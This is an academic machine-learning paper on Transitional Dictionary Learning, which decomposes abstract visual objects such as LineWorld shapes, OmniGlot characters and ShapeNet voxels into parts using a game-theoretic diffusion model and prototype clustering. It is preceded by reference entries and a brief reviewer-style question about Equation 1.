Ryan SJ d Baker, Albert T Corbett, and Vincent Aleven. More accurate student modeling through contextual estimation of slip and guess probabilities in Bayesian knowledge tracing. In Intelligent Tutoring Systems: 9th International Conference, ITS 2008, Montreal, Canada, June 23–27, 2008, Proceedings 9, pp. 406–415. Springer, 2008.

Danielle S Bassett and Marcelo G Mattar.
A network neuroscience of human learning: potential to inform quantitative theories of brain and behavior. Trends in Cognitive Sciences, 21(4):250–264, 2017.

Matthew J Beal and Zoubin Ghahramani. The variational Bayesian EM algorithm for incomplete data: with application to scoring graphical model structures. Bayesian Statistics, 7:453–464, 2003.

Yoshua Bengio, Aaron Courville, and Pascal Vincent. Representation learning: A review and new perspectives. IEEE Transactions on Pattern Analysis and Machine Intelligence, 35(8):1798–1828, 2013.

David M Blei, Alp Kucukelbir, and Jon D McAuliffe. Variational inference: A review for statisticians. Journal of the American Statistical Association, 112(518):859–877, 2017.

F Brändle, M Binz, and E Schulz. Exploration beyond bandits. In The Drive for Knowledge: The Science of Human Information-Seeking, pp. 147–168. Cambridge University Press, 2022.

John S Breese, David Heckerman, and Carl Kadie. Empirical analysis of predictive algorithms for collaborative filtering. arXiv preprint arXiv:1301.7363, 2013.

Leslie Burkholder. Equipoise and ethics in educational research. Theory and Research in Education, 19(1):65–77, 2021. doi: 10.1177/14778785211009105.
uqxBTcWRnj
How can $\theta$ be optimized in Eq. 1 if it does not appear in the two terms? The definition of the decoder $g(\cdot)$ is not consistent. Does it take $\theta$ as a condition or not? Seemingly Eq. 2 is the appropriate form.
Bridging Neural and Symbolic Representations with Transitional Dictionary Learning

Junyan Cheng
Thayer School of Engineering, Dartmouth College
Hanover, NH 03755, USA
[email protected]

Peter Chin
Thayer School of Engineering, Dartmouth College
Hanover, NH 03755, USA
[email protected]

Abstract

This paper introduces a novel Transitional Dictionary Learning (TDL) framework that can implicitly learn symbolic knowledge, such as visual parts and relations, by reconstructing the input as a combination of parts with implicit relations. We propose a game-theoretic diffusion model to decompose the input into visual parts using the dictionaries learned by the Expectation Maximization (EM) algorithm, implemented as online prototype clustering, based on the decomposition results. Additionally, two metrics, clustering information gain and a heuristic shape score, are proposed to evaluate the model. Experiments are conducted on three abstract compositional visual object datasets, which require the model to utilize the compositionality of the data instead of simply exploiting visual features. Then, three tasks on symbol grounding to predefined classes of parts and relations, as well as transfer learning to unseen classes, followed by a human evaluation, were carried out on these datasets. The results show that the proposed method discovers compositional patterns, significantly outperforming state-of-the-art unsupervised part segmentation methods that rely on visual features from pre-trained backbones. Furthermore, the proposed metrics are consistent with human evaluations.

1 Introduction

In recent years, there has been a desire to incorporate the interpretability, compositionality, and logic of symbolic systems into neural networks (NNs). Existing methods combine them in an ad hoc manner. Dong et al. (2019) and Wang et al. (2019) convert symbolic programs into differentiable forms. Cornelio et al. (2023) and Segler et al. (2018) introduce symbolic modules to assist NNs. Gupta & Kembhavi (2023) use neural and symbolic modules as building blocks for visual programs. These methods do not truly bring symbolic power to NNs, but simply allow them to work synergistically. The essential disparity lies at a low level: NNs use distributed representations, while symbolic systems use symbolic representations. This motivates us to explore ways to bridge neural and symbolic representations, thus combining the two types of intelligence from the ground up. Cognitive science studies (Taniguchi et al., 2018) have suggested that symbolic representation in the human brain does not appear out of nowhere; rather, there is a gradual transition from neural perception to preliminary symbols and eventually to symbolic languages over the course of human evolution, as people observe and interact with their environment. The transitional representation, preliminary symbols, is essential in connecting neural and symbolic representation. Taking this concept into account, we attempt to replicate the process of transitional representation arising from neural representation, through unsupervised learning on visual observations in this study, as an exploration of a potential path toward unifying neural and symbolic thinking at the representation level. A representation explains how the input is made up of reusable components (Bengio et al., 2013).
Taking visual observations as an example, distributed representation is explained by vectors, such as principal components, that illustrate high-dimensional statistical features, while symbolic representation uses structural methods, such as logic sentences, that explain the visual parts and their connections. A transitional representation should lie in between: it should (1) contain high-dimensional details of the input and (2) imply structural information about the semantics of the input.

Figure 1: Decomposing samples from three datasets into visual parts marked with different colors; shallowness represents confidence. Odd columns are input, even columns are decompositions.

We propose a novel Transitional Dictionary Learning (TDL) framework that implicitly learns symbolic knowledge, such as visual parts and relations, by reconstructing the input as a combination of parts with implicit relations. With a simple fine-tuning that aligns the output with human preference through reinforcement learning and a heuristic reward, the model can give a human-interpretable decomposition of the input; examples are shown in Figure 1. TDL uses an Expectation Maximization (EM) algorithm to iteratively update dictionaries that store hidden representations of symbolic knowledge, through an online prototype clustering on the visual parts decomposed from the inputs by a novel game-theoretic diffusion model using the current dictionaries. We suggest two metrics to evaluate the learned representation: clustering information gain, which assesses whether the learned dictionary is parsimonious and representative, and a heuristic shape score, which assesses whether the decompositions are in line with human intuition. We conduct unsupervised learning experiments on three abstract compositional visual object datasets, which require the model to utilize the compositionality of the data instead of simply visual features, and three tasks on symbol grounding to predefined classes of parts and relations, and transfer learning to unseen classes. The results show huge improvements compared to the state-of-the-art part segmentation baselines, which struggle to process abstract objects that lack distinct visual features. We also conduct human evaluations; the results demonstrate significantly improved interpretability of the proposed method, and the proposed metrics are consistent with human assessments. Our contributions are summarized as follows.

- We propose the unsupervised Transitional Dictionary Learning to learn symbolic features in representations with a novel game-theoretic diffusion model and online prototype clustering.
- We introduce two metrics, the clustering information gain and the heuristic shape score, to evaluate the learned representation and give evaluation results that agree with human judgment.
- We perform experiments, compare our method with state-of-the-art unsupervised part segmentation models, and conduct human evaluations for all models and proposed metrics.

Our code and data are available at https://github.com/chengjunyan1/TDL

2 RELATED WORK

Neural-Symbolic Learning. Some approaches incorporate a symbolic program to assist NNs. Segler et al. (2018) used a tree search in learning retrosynthetic routes, Amizadeh et al. (2020) applied first-order logic to answer visual questions, and Young et al. (2019) introduced a symbolic controller to generate repeating visual patterns. However, they are usually tailored to specific tasks. Program synthesis could be more flexible. Inala et al.
(2020) synthesized multi-agent communication policies, Sun et al. (2021) searched for autonomous vehicle control programs, and Gupta & Kembhavi (2023) synthesized visual task scripts. Nevertheless, symbolic thinking was not truly incorporated. Thus, differentiable symbolic modules have been proposed. Wang et al. (2019) relaxed an SAT solver as a NN layer, Riegel et al. (2020) made first-order logic propositions differentiable, Dong et al. (2019) used NNs as trainable logical functions, Dai et al. (2019) optimized NNs with abductive logic, and Goyal et al. (2021) learned neural production systems of visual entities. However, they overlooked the fact that the disparity between neural and symbolic representations is the source of the problem.

Compositional Representation. Fei-Fei & Perona (2005) and Csurka et al. (2004) show early efforts to learn compositionality through bags of words. Hinton (2021) proposed an architecture to learn part-whole hierarchies, which Garau et al. (2022) implemented using an attention model. Du et al. (2020) employed Energy-Based Models (EBMs) to learn compositional parts for image generation. Chen et al. (2020) learned to compose programs from basic blocks. Mendez et al. (2022) learned reusable compositions for lifelong learning. Lake et al. (2015) used Bayesian Program Learning to compose handwritten characters from parts and strokes. Shanahan et al. (2020) used attention to learn relations among objects. Mao et al. (2019) learned visual concept embeddings, and Cao et al. (2021) learned them as prototypes. Kipf et al. (2020) used contrastive learning to embed concepts and implicit relations, and Wu et al. (2022) employed EBMs to embed concepts and relations for zero-shot inference. Du et al. (2021) also used EBMs to represent concepts. LeCun (2022) introduced an EBM-based framework to learn hierarchical planning. In comparison, we aim to learn the seamless transition between neural and symbolic representations unsupervisedly.

Unsupervised Segmentation. Segmentation extracts structural information from visual inputs. Lin et al. (2020) used spatial attention to learn scene parsing. Bear et al. (2020) utilized physical properties. Kim et al. (2020) clustered on feature maps, and Van Gansbeke et al. (2021) improved this with contrastive learning. Lou et al. (2022) parsed scene graphs by aligning the image with the dependency graph of a caption. Melas-Kyriazi et al. (2022) used deep spectral methods to segment. The parsed elements in these methods are not reusable; co-part segmentation attempts to address this. Collins et al. (2018) learned visual concepts by NMF. Hung et al. (2019) and Choudhury et al. (2021) learned reusable parts by self-supervised learning. Amir et al. (2021) extracted concepts from a pre-trained vision Transformer. Gao et al. (2021) learned co-parts utilizing motions in videos. Ziegler & Asano (2022) uncovered parts with Sinkhorn-Knopp clustering. Yu et al. (2022) utilized capsule networks to discover face parts, and He et al. (2022) learned parts by hierarchical image generation. However, they rely on concrete visual features and learn visual patterns instead of discovering compositionality like us, and thus do not work on abstract input, as shown in the experiments in Section 5.

3 TRANSITIONAL DICTIONARY LEARNING

We first introduce the transitional representation and its optimization target in Section 3.1, then optimize this target with our TDL framework based on an EM algorithm in Section 3.2.
Finally, we propose the clustering information gain to evaluate the learned representation in Section 3.3. We use the following convention unless specified separately: superscript \(^i\) denotes \(i\)-arity, superscript \(^{(i)}\) with brackets denotes the \(i\)-th sample in a dataset, and subscript \(_i\) denotes the \(i\)-th visual part in a sample.

3.1 TRANSITIONAL REPRESENTATION

Given a visual input \(x \in \mathbb{R}^{H \times W \times C}\) (assumed 2D here for simplicity without loss of generality), we can compress it into a low-dimensional embedding \(r = f(x) \in \mathbb{R}^d\) using a NN or other machine learning model \(f\) that minimizes the reconstruction error by \(\min_r \epsilon(g(r), x)\) with a decoder \(g\). As discussed above, such representations lack interpretability, compositionality, and structural information. Alternatively, we can employ a symbolic representation that explicitly identifies structural information. Predicate logic, the dominant and theoretically complete (Newell & Simon, 1976) symbolic representation, expresses the input \(x\) as a conjunction of logical sentences \(\Omega = \rho^1_1(\cdot) \land \rho^1_2(\cdot) \land \ldots \land \rho^1_k(\cdot) \land \rho^2_1(\cdot) \land \rho^2_2(\cdot) \land \ldots\) that minimizes the semantic distance \(\min_\Omega d_S(\Omega, x)\), where \(\rho^k_i\) is the \(i\)-th logical sentence using a predicate of arity \(k\), the number of arguments. Arguments \(\cdot\) can be logic variables, constants, or even logical sentences that form higher-order sentences. To simplify the analysis while keeping generality, we assume that an input \(x\) is linearly composed of visual parts \(x_i\) by \(x = \sum_{i=1}^{N_P} x_i\), where \(N_P\) is the number of parts, although non-linear assumptions exist, such as viewing an image as a stack of layers or a projection from 3D space. To create a meaningful logical representation that is semantically close to \(x\), we begin with the entity mappings \(x_i \rightarrow \rho^1_j\), grounding a 1-ary entity predicate \(\rho^1_j \in D^1\) from the dictionary \(D^1\), such as \(Cat(x_i)\), \(Tree(x_i)\), \(Person(x_i)\), in \(x_i\). Then, we construct relation mappings with higher-ary predicates, taking 2-ary as an example, \((x_i, x_j) \rightarrow \rho^2_k\), where \(\rho^2_k \in D^2\), such as \(left\_of(x_i, x_j)\), \(larger(x_i, x_j)\). Finally, we depict the attributes with predicates such as \(Red(x_i)\), \(Length(x_i, 5cm)\). This process is an optimization problem \(\arg \max_\Omega P(\Omega \mid x, D)\), where \(D = \{D^1, D^2, \ldots\}\) is a collection of dictionaries of predicates of different arities. There are two major drawbacks, which also led to the downfall of symbolic AI. Firstly, symbol grounding that links predicates to visual components is non-trivial. Although it can be automated by supervised learning, annotation is expensive and inflexible. Secondly, designing attribute predicates that capture all the details is impossible. Therefore, we propose a transitional representation, the neural logic variables \( R = \{r_1, r_2, \ldots, r_{N_P}\} \), generated by a model \( f(x; \theta) \) whose parameters \( \theta \) implicitly encode a hidden dictionary playing the role of \( D \). \( R \) is composed of entity vectors \( r_i \in \mathbb{R}^d \) and follows the optimization target
\[ \min_\theta \sum_{i=1}^{N} \epsilon\bigl(g(R^{(i)}; \theta), x^{(i)}\bigr) + \alpha\, \mathbb{E}_{\tilde{D}}\bigl[ d_S\bigl(g_{\tilde{D}}(R^{(i)}), x^{(i)}\bigr) \bigr], \quad \text{where } R^{(i)} = f(x^{(i)}; \theta), \tag{1} \]

where \( R^{(i)} = \{r_j^{(i)}\}_{j=1}^{N_P} \) are the variables for sample \( x^{(i)} \) in dataset \( X = \{x^{(i)}\}_{i=1}^{N} \); for simplicity, we omit the parameters of the decomposition models \( f \) and \( g \), which also need to be optimized in this target. It minimizes both the reconstruction error, through the first, “neural” term, where \( g(R^{(i)}; \theta) = \sum_{j=1}^{N_P} \hat{g}(r_j^{(i)}; \theta) \) and \( \hat{g}(r_j^{(i)}; \theta) \) is the decoder, and the expected semantic distance over all meaningful concrete dictionaries, through the second, “symbolic” term. The predicate head \( g_{\tilde{D}} \) maps \( R^{(i)} \) to logic sentences \( \Omega^{(i)} = g_{\tilde{D}}(R^{(i)}) \) that maximally preserve the semantics of the input given a concrete dictionary \( \tilde{D} \). \( d_S \) is an ideal metric that can accurately measure whether two representations express the same semantics. The expectation considers all meaningful dictionaries for an input (e.g., different fonts for the same character), while non-meaningful ones are not considered (e.g., a dictionary for cats when the inputs are dogs). The coefficient \( \alpha \) balances the two goals. In practice, we can train an “average” dictionary whose transitional representations have minimal possible distance to all concrete ones, and then align it to each by fine-tuning. Transitional representation tackles the second problem above by compressing attributes into embeddings; the first problem is addressed with the unsupervised learning discussed in Section 3.2.

### 3.2 Expectation-Maximization for Transitional Representation

The first term in Equation 1 can be optimized by the following target (Kreutz-Delgado et al., 2003):

\[ \arg\min_\theta \sum_{i=1}^{N} \epsilon\Bigl(x^{(i)}, \sum_{j} \hat{g}(r_j^{(i)}; \theta)\Bigr) + \lambda \sum_{j} |r_j^{(i)}|, \tag{2} \]

which optimizes the hidden dictionary \( \theta \) by minimizing the reconstruction error from visual parts. However, the key challenge comes from the second term. We consider \( R = \{r_i\}_{i=1}^{N_P} \), or its corresponding visual parts, as a bag of words for the image \( x \) that implicates hidden logical sentences \( \Omega_R = g_\theta(R) \), where the optimal \( \theta^* = \arg\min_\theta \mathbb{E}_{\tilde{D}}[d_S(g_{\tilde{D}}(R), g_\theta(R))] \). As we only need to consider meaningful dictionaries \( \tilde{D} = \arg\min_{\tilde{D}} d_S(g_{\tilde{D}}(R), x) \) that allow semantically equivalent representations of the input \( x \), an alternative target for Equation 1 is:

\[ \min_\theta \sum_{i=1}^{N} \epsilon\bigl(g(R^{(i)}; \theta), x^{(i)}\bigr) + \alpha\, d_S\bigl(x^{(i)}, g_\theta(R^{(i)})\bigr). \]

We can reasonably assume that \( d_S(x^{(i)}, g_\theta(R^{(i)})) \propto -P(\Omega_{R^{(i)}} \mid x^{(i)}, \theta) \), since meaningful logic variables and relations, i.e., reusable and compositional ones, are more likely to appear in the dataset than non-meaningful ones. In other words, the optimal dictionary \( \theta^* \) maximizes the likelihood of the dataset.
By regarding \( x^{(i)} \) as a visual sentence composed of visual words \( R^{(i)} \) and the dataset \( X \) as a visual corpus, we optimize the second term in the alternative target via an EM algorithm inspired by the Unigram Language Model (ULM; Kudo, 2018), which maximizes the likelihood of the dataset by iteratively updating the dictionaries given the visual parts decomposed using the current dictionary:

\[ \arg\max_\theta L = \sum_{i=1}^{N} \log P(\Omega_{R^{(i)}} \mid x^{(i)}, \theta). \tag{3} \]

The likelihood of the dataset is computed by summing the log-likelihoods of the logic representations of all samples \( x^{(i)} \) over arities 1 to \( N_A \), \( L = \sum_{i=1}^{N} \sum_{j=1}^{N_A} \log P(\Omega^j_{R^{(i)}} \mid x^{(i)}, \theta) \), where \( \Omega^j_{R^{(i)}} \) collects the \( j \)-ary sentences. For 1-ary, we follow ULM with \( \log P(\Omega^1_{R^{(i)}} \mid x^{(i)}, \theta) = \sum_{k=1}^{N_P} \log P(r_k^{(i)}) \); for 2-ary, the Markov assumption for sequential data is not suitable, thus we use a joint probability \( \log P(\Omega^2_{R^{(i)}} \mid x^{(i)}, \theta) = \sum_{p=1}^{N_P} \sum_{q=1}^{N_P} \log P(r_p^{(i)}, r_q^{(i)}) \), and the same applies to higher arities. The optimization targets in Equations 2 and 3 give our Transitional Dictionary Learning (TDL) framework. Equation 3 can be optimized by clustering all decomposed visual parts, pairs of parts, etc. The complexity increases exponentially with the arity, which is unacceptable even though low arities suffice to provide graph-level representational power; we therefore use techniques like online clustering and random sampling to improve efficiency, as discussed in Section 4.2. Further discussion of the limitations and the broader impacts of the TDL framework can be found in the appendix.

### 3.3 Clustering Information Gain

We wish the learned predicates to be reusable and compositional: the decomposed parts and pairs of the test set should cluster into as few centroids $C$ as possible. Thus, we propose Clustering Information Gain (CIG), which compares the Mean Clustering Error (MCE) of the decomposed parts in the test set,

\[ \mathrm{MCE} = \frac{1}{N} \sum_{i=1}^{N} \frac{1}{N_P} \sum_{j=1}^{N_P} \min_{c \in C} \bigl\lVert r_j^{(i)} - c \bigr\rVert_2, \]

with that of a random decomposition, \( \mathrm{MCE}_{\mathrm{rand}} \), which upper-bounds the MCE when the decomposed terms are randomly scattered; the best case of MCE is 0, attained when the parts match the learned predicates perfectly. CIG is given by \( \mathrm{CIG} = 1 - \mathrm{MCE}_{\mathrm{model}} / \mathrm{MCE}_{\mathrm{rand}} \), normalized between \([0, 1]\). See the appendix for more details.
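A minimal sketch of these metrics (names ours), assuming the decomposed part embeddings and clustering centroids are given as arrays:

```python
import numpy as np

def mean_clustering_error(parts, centroids):
    """MCE: average distance of each part embedding to its nearest centroid.

    parts:     list of arrays, one (N_P_i, d) array per sample
    centroids: (num_centroids, d) array of cluster centers C
    """
    per_sample = []
    for r in parts:
        d = np.linalg.norm(r[:, None, :] - centroids[None, :, :], axis=-1)
        per_sample.append(d.min(axis=1).mean())   # mean over parts
    return float(np.mean(per_sample))             # mean over samples

def clustering_information_gain(parts, centroids, random_parts):
    """CIG = 1 - MCE_model / MCE_rand (Sec. 3.3)."""
    mce_model = mean_clustering_error(parts, centroids)
    mce_rand = mean_clustering_error(random_parts, centroids)
    return 1.0 - mce_model / mce_rand
```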
### 4 Method

Figure 2: Overview of our architecture. The decomposition process takes $K$ steps to iteratively refine the generated visual parts. $N_P$ models generate in parallel, each generating one part and communicating through “Broadcast”. The mapped representations are stored in a memory bank for clustering.

To implement TDL, we need an encoder $f : x \rightarrow R$ that decomposes the input $x$ into $R = \{r_i\}_{i=1}^{N_P}$, where each $r_i$ is decoded by a decoder $g : r_i \rightarrow m_i$ into a visual part $x_i = m_i \odot x$, with $m_i \in [0, 1]^{H \times W \times C}$ a mask. Inspired by Wu et al. (2022), we adopt a U-Net-based diffusion model (Song et al., 2021) to iteratively refine the generated masks: the encoder downsamples $x$ to the embedding $r_i$, which is upsampled by the decoder as $m_i$. The model iterates for $K$ steps. $N_P$ copies of the model, sharing the same parameters, generate $N_P$ masks in parallel, each producing one mask. At each step, for model $i$, the mask $m_i(t)$ generated in the previous step (a random mask for the first step) and other feature maps, such as the other models’ outputs, are fed as input to produce an updated mask $m_i(t + 1)$. After $K$ steps, the model outputs $N_P$ visual parts and the corresponding representation $R$. To generate multiple meaningful visual parts at the same time, we propose a game-theoretic method in Section 4.1, inspired by Gemp et al. (2021), who model PCA as a competitive game of principal components. We regard the decomposition process as a cooperative game of visual parts that converges in $K$ steps to cooperatively reconstruct the input while competing with each other to avoid repetition and so on. Each part is adjusted by a “player”, one of the $N_P$ copies of the model. With the visual parts generated, we use prototype clustering to implement the EM algorithm in Section 4.2. We also introduce a shape score to measure model performance and serve as a reward to tune the unsupervised learned model with reinforcement learning in Section 4.3. Figure 2 shows an overview of our method.

4.1 Game-theoretic Decomposition

A player model adjusts the generated visual parts to maximize a utility given by the negative of a game-theoretic (GT) loss

$$L_{GT} = L_{Rec} + \alpha_1 L_{overlap} + \alpha_2 L_{resources} + \alpha_3 L_{norm}$$ (4)

which evaluates the equilibrium state composed of the $N_P$ generated parts $(x_1, x_2, \ldots, x_{N_P})$. In detail:

**Reconstruction Error.** $L_{Rec}$ evaluates the reconstructed input $\hat{x} = \sum_{i=1}^{N_P} x_i$ using a combination of focal loss (Lin et al., 2017) and dice loss (Milletari et al., 2016).

**Overlapping Penalty.** $L_{overlap} = \sum_{H,W,C} \max\bigl(0, \sum_{i=1}^{N_P} m_i - 1\bigr)$ introduces competition between players that avoids overlap between parts by penalizing redundantly covered pixels.

**Resources Penalty.** $L_{resources} = \sum_{i=1}^{N_P} \max(0, |m_i| - q_R)$, where $q_R \in \mathbb{R}$ is the quota of a player, prevents one player from reconstructing everything while others output empty masks. The quota restricts one player from having enough resources to output the entire input, thus requiring cooperation.

**L2 Norm.** $L_{norm} = \sum_{i=1}^{N_P} \lVert\tilde{m}_i\rVert^2_2$, where $\tilde{m}_i$ is the unactivated mask before the Sigmoid function, simplifies the search space of the model to accelerate convergence.

See Appendix E for further details. We follow SMaLD (Song et al., 2021) to train a scoring network $f_S(s_i(t); \theta, \phi) \approx \nabla_{m_i(t)} L_{GT}$, where $\phi = \{\phi^i\}_{i=1}^{N_A}$ are the prototype dictionaries from 1- to $N_A$-ary discussed in Section 4.2, to approximate the gradient of the optimal move for each player $i$, i.e., the move that maximizes the utility $-L_{GT}$. The input state $s_i(t) = (e_i(t), \tilde{x}_i(t))$ includes the feature map $\tilde{x}_i(t) = \text{concat}(x; m_i(t); \sum_{k \neq i} m_k(t), \ldots)$, which contains the input, the current mask, and the moves of the other players (i.e., the “broadcast”), and an embedding $e_i(t) = e_i^{\text{time}}(t) + e_i^{\text{pid}} + e_i^{\text{pred}}(t)$ covering a time step $e_i^{\text{time}}(t) \in \mathbb{R}^{d_{emb}}$ and player index $e_i^{\text{pid}} \in \mathbb{R}^{d_{emb}}$ from learned embedding tables, and a predicate embedding $e_i^{\text{pred}}(t) = \sum_{\sigma \in \phi} P(\sigma \mid x_i(t))\, \sigma$ computed at every step. The move is sampled by Langevin dynamics $m_i(t+1) = m_i(t) - \epsilon \nabla_{m_i(t)} L_{GT} + \sqrt{2\epsilon}\, z(t)$, $z(t) \sim \mathcal{N}(0, I)$, $t = 0, 1, \ldots, K$, where $\epsilon$ is the step size.
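A minimal sketch of the $K$-step refinement loop, assuming a trained score network `score_fn` that approximates $\nabla_{m_i(t)} L_{GT}$ (names and the clipping choice are ours):

```python
import numpy as np

def decompose(x, score_fn, n_players, K=50, eps=1e-3, seed=0):
    """K-step Langevin refinement of N_P masks (Sec. 4.1 sketch).

    score_fn(x, masks, i, t) is assumed to return the approximate
    gradient of L_GT w.r.t. player i's mask, given the input image,
    all current masks (the "broadcast"), the player index, and t.
    """
    rng = np.random.default_rng(seed)
    masks = [rng.uniform(0, 1, size=x.shape) for _ in range(n_players)]
    for t in range(K):
        grads = [score_fn(x, masks, i, t) for i in range(n_players)]
        for i in range(n_players):
            noise = np.sqrt(2 * eps) * rng.standard_normal(x.shape)
            # Descend the GT loss (i.e., ascend the utility -L_GT)
            masks[i] = np.clip(masks[i] - eps * grads[i] + noise, 0.0, 1.0)
    return masks  # visual parts are x_i = masks[i] * x
```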
A loss term $L_{SMaLD}$ from the SMaLD paper can be used to minimize $E[||\nabla_{m_i(t)} L_{GT} - f_S(s_i(t); \theta)||^2]$, training the scoring network to give good approximations. We apply this term as a regularizer to form the Decomposition Loss $L_{Decomposition} = L_{GT} + \beta L_{SMaLD}$ in Figure 2. Further details can be found in Appendix A.

4.2 Online Prototype Clustering

We cluster $R$ to implement the EM algorithm in Equation 3. As discussed in Section 3, we learn multiple dictionaries for different arities. Each dictionary is composed of prototypes $\phi^i \in \mathbb{R}^{N_\phi \times d_\phi}$, where $N_\phi$ is the dictionary size and $d_\phi$ is the dimension of a prototype. We train a predicate head for each dictionary: for example, for 1-ary, $\mu^1_i = f_\mu^1(r_i)$ maps a neural logic variable $r_i$ to a representation $\mu^1_i \in \mathbb{R}^{d_\mu}$; for 2-ary, $\mu^2_i = f_\mu^2(r_i, r_j)$ maps a pair $(r_i, r_j)$. In our work, the mappers are implemented as convolution layers on visual parts and their combinations, e.g., $\mu^2_k = f_\mu^2(x_i + x_j)$.

We perform online clustering during training by maintaining a FIFO memory bank $M = \{M^i\}_{i=1}^{N_A}$, where $M^i \in \mathbb{R}^{L_M \times d_\mu}$, that adds the new terms $\mu^i$ after each training step. Similar to Caron et al. (2018), we run K-Means every one or a few training steps after the warm-up epochs, on the set $\mu^i \cup M^i$ for each dictionary, where, taking 1-ary as an example, $\mu^1 = (\mu^{1(1)}, \mu^{1(2)}, ..., \mu^{1(B)})$ is the set of 1-ary representations in an input batch of length $B$. $\mu^i$ has gradients while $M^i$ does not. We drop unwanted terms, such as empty ones, and randomly sample, for example, 30% of the pairs to increase efficiency. K-Means outputs assignments $C^i$ for each term in $\mu^i$; we then create pseudo-labels $Y^i$ for the prototypes in the dictionary $\phi^i$ by assigning them to their nearest clustering centroids from $C^i$. We then minimize the distance between prototypes and their assigned centroids in latent space with a Cross-Entropy (CE) loss, $\min_{\phi, \theta} L_{CE} = \text{CELoss}(\text{dist}(\mu^i, \phi^i), Y^i)$, where dist is a distance metric (e.g., L2 distance). The Clustering Loss is the sum of the CE losses over all dictionaries, $L_{Clustering} = \gamma \sum_{i=1}^{N_A} L_{CE}$. We optimize it together with the decomposition loss as $L_{TDL} = L_{Clustering} + L_{Decomposition}$ to implement the TDL framework. More details can be found in Appendix A.2. We visualize the latent space of a model trained on LineWorld for all decomposed parts of the test set in Appendix D using t-SNE: the predicates in the dictionary are learned as distinct clusters, while the baseline UPD, which provides no predicate information, shows a less organized latent space.

4.3 Reinforcement Learning and Shape Score

We employ PPO (Schulman et al., 2017) to tune the unsupervised learned model, regarding the decomposition process as an episode. We use a heuristic shape score to evaluate a decomposed part via three factors (a sketch implementing them follows below). (1) Continuity $R_{\text{cont}}$: the shape is not segmented and is an integral whole. $R_{\text{cont}} = \frac{\max(A_C)}{\sum(A_C)}$, where $A_C$ is the list of contoured areas for the segments of a part; $R_{\text{cont}} = 1$ if the part is not segmented. We use `findContours` in OpenCV to obtain the segments for 2D data and DBSCAN for 3D data after converting to point clouds. (2) Solidity $R_{\text{solid}}$: no holes inside a part. $R_{\text{solid}} = \frac{A_P}{\sum(A_C)}$, where $A_P$ is the space or area of the part; $R_{\text{solid}} = 1$ if there is no hole. (3) Smoothness $R_{\text{smooth}}$: the surfaces or contours of the part are smooth. $R_{\text{smooth}} = \frac{\rho_S}{\rho_O}$, where $\rho_S$ is the perimeter of the smoothed largest contour and $\rho_O$ that of the original contour. We apply RDP to smooth 2D data and alpha shapes for 3D. The shape score $R_S = R_{\text{cont}} \times R_{\text{solid}} \times R_{\text{smooth}}$ is normalized between 0 and 1. It can also be used to measure model performance. See Appendix J for more details.
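To make the three factors concrete, below is a minimal 2D implementation sketch, assuming a binary part mask and OpenCV 4; the RDP tolerance `rdp_eps` is an illustrative choice rather than a value from the paper.

```python
import cv2
import numpy as np

def shape_score_2d(mask, rdp_eps=2.0):
    """Shape score R_S = R_cont * R_solid * R_smooth for a binary 2D part."""
    mask = (mask > 0).astype(np.uint8)
    contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    if not contours:
        return 0.0
    areas = [cv2.contourArea(c) for c in contours]
    total = sum(areas) + 1e-8

    r_cont = max(areas) / total                   # 1.0 iff the part is one segment
    # Holes reduce the filled pixel count below the outer-contour area.
    r_solid = min(1.0, float(mask.sum()) / total)
    largest = max(contours, key=cv2.contourArea)
    smoothed = cv2.approxPolyDP(largest, rdp_eps, True)       # RDP smoothing
    r_smooth = cv2.arcLength(smoothed, True) / (cv2.arcLength(largest, True) + 1e-8)
    return float(np.clip(r_cont * r_solid * r_smooth, 0.0, 1.0))
```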
5 Experiments

Figure 3: Examples from the OmniGlot test set. Our method generates multiple interpretable strokes to reconstruct the input handwritten characters. In comparison, the baseline methods segment the input into colored parts that are not valid strokes, revealing a failure to learn compositionality.

In Section 5.1, we present our experimental setup for assessing whether models can learn meaningful components of abstract objects without supervision; the results are discussed in Section 5.2. We then evaluate the learned representations by pre-training the models in an unsupervised manner and fine-tuning them on downstream tasks in Section 5.3. Finally, we conduct a human study in Section 5.4.

5.1 Experiment Setting

We use three abstract compositional visual object datasets, shown in Figure 1, in which parts cannot be separated by edges, features, colors, etc. Such contiguous shapes can only be decomposed with knowledge of compositionality, thus excluding confounds. **LineWorld** is generated by the babyARC engine (Wu et al., 2022) and consists of images with 1 to 3 non-overlapping shapes made up of parallel or perpendicular lines. **OmniGlot** (Lake et al., 2015) contains handwritten characters. **ShapeNet5** is composed of 3D shapes in 5 categories (bed, chair, table, sofa, lamp) from ShapeNet (Chang et al., 2015), voxelized by binvox (Min, 2004-2019). We replace 2D conv layers with 3D ones when using this dataset. We create three downstream tasks based on these datasets in Section 5.3.

We compare three state-of-the-art unsupervised part segmentation methods: **DFF** (Collins et al., 2018) clusters pixels by non-negative matrix factorization (NMF) on the activations of the last conv layer; **SCOPS** (Hung et al., 2019) and **UPD** (Choudhury et al., 2021) learn to produce a $k$-channel heatmap of parts in a self-supervised manner. The baselines require pre-trained visual backbones; accordingly, we use VGG19 for 2D data and MedicalNet (Chen et al., 2019), a ResNet-based high-resolution 3D medical voxel model, for 3D. We conducted hyperparameter searches for the baselines to obtain their best results. Further details of the setting are provided in Appendix B.

5.2 UNSUPERVISED LEARNING OF TRANSITIONAL REPRESENTATION

| | LineWorld (IoU / CIG / SP) | OmniGlot (MAE / CIG / SP) | ShapeNet5 (IoU / CIG / SP) | LW-G (IoU / Acc.) | OG-G (IoU) |
|--------|---------------------------|---------------------------|----------------------------|-------------------|------------|
| AE | 97.7 / - / - | 0.9 / - / - | 85.1 / - / - | - | - |
| DFF | - / 33.1 / 38.3 | - / 36.9 / 33.3 | - / 20.1 / 19.2 | 43.1 / 28.8 | 42.8 |
| SCO. | - / 35.7 / 42.4 | - / 38.6 / 38.9 | - / 23.1 / 24.3 | 46.8 / 26.4 | 46.9 |
| UPD | - / 36.3 / 42.8 | - / 42.8 / 37.4 | - / 25.4 / 22.6 | 46.2 / 28.7 | 48.9 |
| Ours | 94.3 / 58.0 / 82.6 | 1.8 / 68.5 / 77.6 | 79.8 / 54.6 / 60.1 | 78.4 / 74.8 | 75.9 |
| w/o RL | 93.7 / 57.0 / 71.9 | 2.0 / 65.1 / 68.0 | 78.8 / 52.9 / 54.4 | 78.2 / 74.3 | 75.1 |

